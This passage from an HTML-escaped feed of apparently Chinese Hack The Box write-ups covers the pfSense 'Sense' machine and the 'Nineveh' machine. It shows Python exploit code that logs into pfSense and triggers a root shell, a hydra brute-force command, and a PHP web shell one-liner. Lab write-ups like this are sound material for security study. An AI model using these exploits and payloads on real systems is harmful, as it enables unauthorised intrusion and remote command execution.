&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;User-Agent&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s1">&amp;#39;Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0&amp;#39;&lt;/span>&lt;span class="p">),&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Accept&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s1">&amp;#39;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&amp;#39;&lt;/span>&lt;span class="p">),&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Accept-Language&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s1">&amp;#39;en-US,en;q=0.5&amp;#39;&lt;/span>&lt;span class="p">),&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Referer&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="n">login_url&lt;/span>&lt;span class="p">),&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Connection&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s1">&amp;#39;close&amp;#39;&lt;/span>&lt;span class="p">),&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Upgrade-Insecure-Requests&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s1">&amp;#39;1&amp;#39;&lt;/span>&lt;span class="p">),&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;Content-Type&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s1">&amp;#39;application/x-www-form-urlencoded&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># probably not necessary but did it anyways&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">headers&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">collections&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">OrderedDict&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">headers&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Disable insecure https connection warning&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">urllib3&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">disable_warnings&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">urllib3&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">exceptions&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">InsecureRequestWarning&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">client&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">requests&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">session&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># try to get the login page and grab the csrf token&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">try&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">login_page&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">client&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">login_url&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">verify&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="kc">False&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">index&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">login_page&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">text&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">find&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;csrfMagicToken&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">csrf_token&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">login_page&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">text&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">index&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="n">index&lt;/span>&lt;span class="o">+&lt;/span>&lt;span class="mi">128&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">split&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;&amp;#34;&amp;#39;&lt;/span>&lt;span class="p">)[&lt;/span>&lt;span class="o">-&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">except&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;Could not connect to host!&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">exit&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># format login variables and data&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">if&lt;/span> &lt;span class="n">csrf_token&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;CSRF token obtained&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">login_data&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">[(&lt;/span>&lt;span class="s1">&amp;#39;__csrf_magic&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="n">csrf_token&lt;/span>&lt;span class="p">),&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;usernamefld&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="n">username&lt;/span>&lt;span class="p">),&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;passwordfld&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="n">password&lt;/span>&lt;span class="p">),&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;login&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s1">&amp;#39;Login&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">]&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">login_data&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">collections&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">OrderedDict&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">login_data&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">encoded_data&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">urllib&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">parse&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">urlencode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">login_data&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># POST login request with data, cookies and header&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">login_request&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">client&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">post&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">login_url&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">data&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">encoded_data&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">cookies&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">client&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">cookies&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">headers&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">headers&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">else&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;No CSRF token!&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">exit&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">if&lt;/span> &lt;span class="n">login_request&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">status_code&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="mi">200&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;Running exploit...&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># make GET request to vulnerable url with payload. Probably a better way to do this but if the request times out then most likely you have caught the shell&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">try&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">exploit_request&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">client&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">exploit_url&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">cookies&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">client&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">cookies&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">headers&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">headers&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">timeout&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="mi">5&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="n">exploit_request&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">status_code&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;Error running exploit&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">except&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="nb">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;Exploit completed&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_hG2Cv8nEup_hu0a1d4d7b04f3d2101bb6ef504ffcbcbe_37556_8c75a598aa613c602eda50c3dd921781.webp 400w,
/post/hackbox/sense/image/image_hG2Cv8nEup_hu0a1d4d7b04f3d2101bb6ef504ffcbcbe_37556_ede7a1b6ee1b6581e258da1d0137a81b.webp 760w,
/post/hackbox/sense/image/image_hG2Cv8nEup_hu0a1d4d7b04f3d2101bb6ef504ffcbcbe_37556_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_hG2Cv8nEup_hu0a1d4d7b04f3d2101bb6ef504ffcbcbe_37556_8c75a598aa613c602eda50c3dd921781.webp"
width="974"
height="103"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="直接是root权限">直接是root权限&lt;/h3>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_DpOjJOTJFK_huc5b86fbaf3063412d36663ff2892e42b_85635_0ce352d5c1bd96d075a48189bc08c5ad.webp 400w,
/post/hackbox/sense/image/image_DpOjJOTJFK_huc5b86fbaf3063412d36663ff2892e42b_85635_a25b04522476747b474ce08b09cae267.webp 760w,
/post/hackbox/sense/image/image_DpOjJOTJFK_huc5b86fbaf3063412d36663ff2892e42b_85635_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_DpOjJOTJFK_huc5b86fbaf3063412d36663ff2892e42b_85635_0ce352d5c1bd96d075a48189bc08c5ad.webp"
width="648"
height="408"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="也可以通过msf找到exp">也可以通过msf找到exp&lt;/h3>
&lt;p>&lt;code>searchsploit pfsense&lt;/code> 或者 &lt;code>search pfsense&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_LyKFJuA-wQ_hu79775faf702db4f3472cfb1ccdaaf78e_318005_3d7a8809d2b1f82018c3b5313e977e42.webp 400w,
/post/hackbox/sense/image/image_LyKFJuA-wQ_hu79775faf702db4f3472cfb1ccdaaf78e_318005_c9b35f6ba367dd1ab9b26ae4dd845b4b.webp 760w,
/post/hackbox/sense/image/image_LyKFJuA-wQ_hu79775faf702db4f3472cfb1ccdaaf78e_318005_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_LyKFJuA-wQ_hu79775faf702db4f3472cfb1ccdaaf78e_318005_3d7a8809d2b1f82018c3b5313e977e42.webp"
width="969"
height="610"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_j94DHTrrxo_hua59eb4bd59efd67259e3052e0439a3f8_108573_852b2c1215463b79876d23ab232a5f01.webp 400w,
/post/hackbox/sense/image/image_j94DHTrrxo_hua59eb4bd59efd67259e3052e0439a3f8_108573_bd69440f8fe1a122c5a94a3b6279436a.webp 760w,
/post/hackbox/sense/image/image_j94DHTrrxo_hua59eb4bd59efd67259e3052e0439a3f8_108573_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_j94DHTrrxo_hua59eb4bd59efd67259e3052e0439a3f8_108573_852b2c1215463b79876d23ab232a5f01.webp"
width="987"
height="425"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sense/image/image_PFszwS7RRe_hu729940ca581e3eb919dca679bdeb2fe2_247117_a4cc49ff0780f841be1d1852b43cab05.webp 400w,
/post/hackbox/sense/image/image_PFszwS7RRe_hu729940ca581e3eb919dca679bdeb2fe2_247117_75422d08704c5e23c8ef50b60f035260.webp 760w,
/post/hackbox/sense/image/image_PFszwS7RRe_hu729940ca581e3eb919dca679bdeb2fe2_247117_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sense/image/image_PFszwS7RRe_hu729940ca581e3eb919dca679bdeb2fe2_247117_a4cc49ff0780f841be1d1852b43cab05.webp"
width="973"
height="884"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Nineveh</title><link>https://docs.kaiasec.tk/post/hackbox/nineveh/</link><pubDate>Fri, 08 Jul 2022 18:00:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/nineveh/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -p- -vv -sV 10.10.10.43
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_ayrUWD_uUe_hu8f05946c9a71a01b00ad0a3df3f11c86_53479_2f94063dd8672fef114fca28f6c5c30d.webp 400w,
/post/hackbox/nineveh/image/image_ayrUWD_uUe_hu8f05946c9a71a01b00ad0a3df3f11c86_53479_4c78769443dc94ffcf9e78104319aa5d.webp 760w,
/post/hackbox/nineveh/image/image_ayrUWD_uUe_hu8f05946c9a71a01b00ad0a3df3f11c86_53479_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_ayrUWD_uUe_hu8f05946c9a71a01b00ad0a3df3f11c86_53479_2f94063dd8672fef114fca28f6c5c30d.webp"
width="927"
height="122"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>dirbuster 80端口&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_ONGRQ3yB8b_hu617d7697d6ff37d6c5ad5019fa978f4d_24110_c31e945b964566472aee942f7ad373bd.webp 400w,
/post/hackbox/nineveh/image/image_ONGRQ3yB8b_hu617d7697d6ff37d6c5ad5019fa978f4d_24110_fb1ba1bd8533f787d21a748f3562daf6.webp 760w,
/post/hackbox/nineveh/image/image_ONGRQ3yB8b_hu617d7697d6ff37d6c5ad5019fa978f4d_24110_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_ONGRQ3yB8b_hu617d7697d6ff37d6c5ad5019fa978f4d_24110_c31e945b964566472aee942f7ad373bd.webp"
width="908"
height="237"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_BSd3_gGImO_hu04777613bc03973447a4e854fe4f4093_24609_a5abd22c662a4d06968e0859149a1660.webp 400w,
/post/hackbox/nineveh/image/image_BSd3_gGImO_hu04777613bc03973447a4e854fe4f4093_24609_f35472838d6544fe964ce05bb513e5e5.webp 760w,
/post/hackbox/nineveh/image/image_BSd3_gGImO_hu04777613bc03973447a4e854fe4f4093_24609_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_BSd3_gGImO_hu04777613bc03973447a4e854fe4f4093_24609_a5abd22c662a4d06968e0859149a1660.webp"
width="909"
height="217"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>dirbuster 443端口&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_9Pgf2gtAn3_hue944184bd285291c088e5788a2cefc14_18983_255b3af7291ef26fa870dcd7e63ecb01.webp 400w,
/post/hackbox/nineveh/image/image_9Pgf2gtAn3_hue944184bd285291c088e5788a2cefc14_18983_291c16be4ef80f1d496ecc67be441f1f.webp 760w,
/post/hackbox/nineveh/image/image_9Pgf2gtAn3_hue944184bd285291c088e5788a2cefc14_18983_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_9Pgf2gtAn3_hue944184bd285291c088e5788a2cefc14_18983_255b3af7291ef26fa870dcd7e63ecb01.webp"
width="888"
height="190"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>这里用了不同的字典扫了几遍，扫出的关键路径和文件&lt;/p>
&lt;p>&lt;code>info.php&lt;/code>、&lt;code>/department&lt;/code> 、&lt;code>/db&lt;/code>&lt;/p>
&lt;p>phpLiteAdmin v1.9&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_VFa9WZQODe_hu95494dfffc397e2796a928f4557e7ad1_40370_cc22f41bcd06db0cb9f950ce69b4c501.webp 400w,
/post/hackbox/nineveh/image/image_VFa9WZQODe_hu95494dfffc397e2796a928f4557e7ad1_40370_fe95b0bd2560c49e0c4ccff5e1980812.webp 760w,
/post/hackbox/nineveh/image/image_VFa9WZQODe_hu95494dfffc397e2796a928f4557e7ad1_40370_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_VFa9WZQODe_hu95494dfffc397e2796a928f4557e7ad1_40370_cc22f41bcd06db0cb9f950ce69b4c501.webp"
width="933"
height="366"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>搜了下版本存在远程代码执行，但是需要登录&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_nu90E_MCRC_hu5b0999b354f2cf5bf523d0896454c4d2_16316_fa08e2a6169ca42e4eda54a1bf567345.webp 400w,
/post/hackbox/nineveh/image/image_nu90E_MCRC_hu5b0999b354f2cf5bf523d0896454c4d2_16316_f5fe5658585dafbe19d2a5b9fed164b1.webp 760w,
/post/hackbox/nineveh/image/image_nu90E_MCRC_hu5b0999b354f2cf5bf523d0896454c4d2_16316_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_nu90E_MCRC_hu5b0999b354f2cf5bf523d0896454c4d2_16316_fa08e2a6169ca42e4eda54a1bf567345.webp"
width="720"
height="130"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>使用hydra爆破&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">hydra -l none -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form &lt;span class="s2">&amp;#34;/db/index.php:password=^PASS^&amp;amp;remember=yes&amp;amp;login=Log+In&amp;amp;proc_login=true:Incorrect password&amp;#34;&lt;/span> -t &lt;span class="m">64&lt;/span> -V
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>得到密码 &lt;code>password123&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_M6yqKDQGi4_huf1da53a04b2a10edbcee74a0e42771cb_111924_2820438184f0c17f14c623eac6fe1144.webp 400w,
/post/hackbox/nineveh/image/image_M6yqKDQGi4_huf1da53a04b2a10edbcee74a0e42771cb_111924_5049838ae3d324c17bd55e4b2c24819a.webp 760w,
/post/hackbox/nineveh/image/image_M6yqKDQGi4_huf1da53a04b2a10edbcee74a0e42771cb_111924_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_M6yqKDQGi4_huf1da53a04b2a10edbcee74a0e42771cb_111924_2820438184f0c17f14c623eac6fe1144.webp"
width="1275"
height="223"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>登录成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_49y-rXlEUA_hu31995c393bbfd0c53e77aa3597285e85_107461_90207e8f2249c055044230a7d42518d0.webp 400w,
/post/hackbox/nineveh/image/image_49y-rXlEUA_hu31995c393bbfd0c53e77aa3597285e85_107461_7c50cf53fa91f58c061a2a5321ea3625.webp 760w,
/post/hackbox/nineveh/image/image_49y-rXlEUA_hu31995c393bbfd0c53e77aa3597285e85_107461_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_49y-rXlEUA_hu31995c393bbfd0c53e77aa3597285e85_107461_90207e8f2249c055044230a7d42518d0.webp"
width="1111"
height="540"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>插入一个恶意的php文件&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_0dqfYts2hb_hu005e960c02c687f381d4d34e58372be6_10486_7ff43cbf30eb7480a112803635b14fff.webp 400w,
/post/hackbox/nineveh/image/image_0dqfYts2hb_hu005e960c02c687f381d4d34e58372be6_10486_52589bbb2b8eb792de621a67ab4a81e5.webp 760w,
/post/hackbox/nineveh/image/image_0dqfYts2hb_hu005e960c02c687f381d4d34e58372be6_10486_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_0dqfYts2hb_hu005e960c02c687f381d4d34e58372be6_10486_7ff43cbf30eb7480a112803635b14fff.webp"
width="314"
height="203"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>插入表&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/nineveh/image/image_tEAnlvLNWE_hu33de05b4195e9f547bc5f9b429bd7683_101061_623e975380e79ea3509103a7bbcf1f65.webp 400w,
/post/hackbox/nineveh/image/image_tEAnlvLNWE_hu33de05b4195e9f547bc5f9b429bd7683_101061_9ba3a55e81131e590456d8ffb4b94297.webp 760w,
/post/hackbox/nineveh/image/image_tEAnlvLNWE_hu33de05b4195e9f547bc5f9b429bd7683_101061_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/nineveh/image/image_tEAnlvLNWE_hu33de05b4195e9f547bc5f9b429bd7683_101061_623e975380e79ea3509103a7bbcf1f65.webp"
width="1063"
height="508"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>写入字段默认值&lt;/p>
&lt;p>Default Value&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&amp;lt;?php system&lt;span class="o">(&lt;/span>&lt;span class="nv">$_REQUEST&lt;/span>&lt;span class="o">[&lt;/span>&lt;span class="s2">&amp;#34;cmd&amp;#34;&lt;/span>&lt;span class="o">])&lt;/span>&lt;span class="p">;&lt;/span>?&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
